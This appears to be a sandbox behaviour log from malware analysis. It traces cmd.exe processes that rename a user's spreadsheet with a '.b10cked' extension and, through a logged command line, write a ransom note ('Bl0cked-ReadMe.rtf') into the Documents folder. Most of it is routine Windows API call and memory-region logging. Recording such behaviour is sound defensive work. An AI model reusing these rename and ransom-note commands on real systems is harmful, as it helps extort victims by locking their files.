(penv=0x2722d0) returned 1 [0131.652] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.652] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.652] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.652] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.652] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.652] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.652] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.652] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.652] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.652] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.652] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f540 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.652] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f540, lpFilePart=0x12f53c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f53c*="Desktop") returned 0x18 [0131.652] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.652] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f2bc | out: lpFindFileData=0x12f2bc) returned 0x270010 [0131.652] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0131.652] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f2bc | out: lpFindFileData=0x12f2bc) returned 0x270010 [0131.653] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0131.653] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f2bc | out: lpFindFileData=0x12f2bc) returned 0x270010 [0131.653] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0131.653] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.653] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.653] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.653] GetEnvironmentStringsW () returned 0x272af0* [0131.653] FreeEnvironmentStringsW (penv=0x272af0) returned 1 [0131.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.654] GetConsoleOutputCP () returned 0x1b5 [0131.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.654] GetUserDefaultLCID () returned 0x409 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f680, cchData=128 | out: lpLCData="0") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f680, cchData=128 | out: lpLCData="0") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f680, cchData=128 | out: lpLCData="1") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.654] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.655] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.655] GetConsoleTitleW (in: lpConsoleTitle=0x2608e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.655] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.656] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.656] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.656] _wcsicmp (_String1="move", _String2=")") returned 68 [0131.656] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0131.656] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0131.656] _wcsicmp (_String1="IF", _String2="move") returned -4 [0131.656] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0131.656] _wcsicmp (_String1="REM", _String2="move") returned 5 [0131.656] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0131.659] GetConsoleTitleW (in: lpConsoleTitle=0x12f378, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.659] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0131.659] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0131.659] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0131.659] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0131.659] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0131.659] _wcsicmp (_String1="move", _String2="CD") returned 10 [0131.659] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0131.659] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0131.659] _wcsicmp (_String1="move", _String2="REN") returned -5 [0131.659] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0131.659] _wcsicmp (_String1="move", _String2="SET") returned -6 [0131.659] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0131.659] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0131.659] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0131.660] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0131.660] _wcsicmp (_String1="move", _String2="MD") returned 11 [0131.660] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0131.660] _wcsicmp (_String1="move", _String2="RD") returned -5 [0131.660] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0131.660] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0131.660] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0131.660] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0131.660] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0131.660] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0131.660] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0131.660] _wcsicmp (_String1="move", _String2="VER") returned -9 [0131.660] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0131.660] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0131.660] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0131.660] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0131.660] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0131.660] _wcsicmp (_String1="move", _String2="START") returned -6 [0131.660] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0131.660] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0131.660] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0131.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.661] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f134, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f12c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f12c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.663] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.663] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.663] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0131.663] _wcsicmp (_String1="GJVVZA~1.XLS", _String2=".") returned 57 [0131.663] _wcsicmp (_String1="GJVVZA~1.XLS", _String2="..") returned 57 [0131.663] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvza~1.xls")) returned 0x20 [0131.663] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.663] SetErrorMode (uMode=0x0) returned 0x0 [0131.663] SetErrorMode (uMode=0x1) returned 0x0 [0131.663] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", nBufferLength=0x104, lpBuffer=0x12eabc, lpFilePart=0x12eaa4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", lpFilePart=0x12eaa4*="GJVVZA~1.XLS") returned 0x26 [0131.663] SetErrorMode (uMode=0x0) returned 0x1 [0131.663] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0131.664] _wcsicmp (_String1="GJVVZA~1.XLS", _String2=".") returned 57 [0131.664] _wcsicmp (_String1="GJVVZA~1.XLS", _String2="..") returned 57 [0131.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvza~1.xls")) returned 0x20 [0131.664] SetErrorMode (uMode=0x0) returned 0x0 [0131.664] SetErrorMode (uMode=0x1) returned 0x0 [0131.664] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", nBufferLength=0x104, lpBuffer=0x12ef38, lpFilePart=0x12ecd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", lpFilePart=0x12ecd0*="GJVVZA~1.XLS") returned 0x26 [0131.664] SetErrorMode (uMode=0x0) returned 0x1 [0131.664] SetErrorMode (uMode=0x0) returned 0x0 [0131.664] SetErrorMode (uMode=0x1) returned 0x0 [0131.664] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x12f140, lpFilePart=0x12ecd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", lpFilePart=0x12ecd0*="gjVvzAf3d4AVCevrZIj.xlsx.b10cked") returned 0x3a [0131.664] SetErrorMode (uMode=0x0) returned 0x1 [0131.664] SetLastError (dwErrCode=0x0) [0131.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx.b10cked")) returned 0xffffffff [0131.664] GetLastError () returned 0x2 [0131.664] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x12e64c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e64c) returned 0x260e70 [0131.664] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x12e64c | out: lpFindFileData=0x12e64c) returned 0 [0131.665] GetLastError () returned 0x12 [0131.665] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0131.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x271be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271be0) returned 0x260e70 [0131.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x12e8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", lpFilePart=0x0) returned 0x3a [0131.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx", nBufferLength=0x104, lpBuffer=0x12e8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx", lpFilePart=0x0) returned 0x32 [0131.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx")) returned 0x20 [0131.666] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx.b10cked"), dwFlags=0x3) returned 1 [0131.667] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0131.667] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12e898 | out: _Buffer=" 1") returned 9 [0131.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.667] GetFileType (hFile=0x7) returned 0x2 [0131.683] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.683] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e824 | out: lpMode=0x12e824) returned 1 [0131.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12e858 | out: lpConsoleScreenBufferInfo=0x12e858) returned 1 [0131.684] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0131.684] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12e898 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0131.684] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12e87c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12e87c*=0x1a) returned 1 [0131.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.684] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.685] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.685] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.685] SetConsoleInputExeNameW () returned 0x1 [0131.685] GetConsoleOutputCP () returned 0x1b5 [0131.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.685] exit (_Code=0) Process: id = "107" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11923 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11924 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11925 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11926 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 11927 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11928 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11929 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11930 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11931 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11932 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12195 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12196 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12197 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12198 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 12199 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 12200 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12201 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12202 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12203 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12204 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12205 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12206 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12207 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12208 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12209 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12210 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12211 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12212 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12213 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12214 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 12215 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12216 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 12217 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 12218 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 163 os_tid = 0x998 [0131.848] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfa64 | out: lpSystemTimeAsFileTime=0x1cfa64*(dwLowDateTime=0x88861bc0, dwHighDateTime=0x1d440a9)) [0131.848] GetCurrentProcessId () returned 0x994 [0131.848] GetCurrentThreadId () returned 0x998 [0131.848] GetTickCount () returned 0x29ff6 [0131.848] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfa5c | out: lpPerformanceCount=0x1cfa5c*=18863724498) returned 1 [0131.849] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.849] __set_app_type (_Type=0x1) [0131.849] __p__fmode () returned 0x76b331f4 [0131.849] __p__commode () returned 0x76b331fc [0131.849] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.849] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.849] GetCurrentThreadId () returned 0x998 [0131.849] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x998) returned 0x38 [0131.849] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.849] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.849] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.849] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.849] 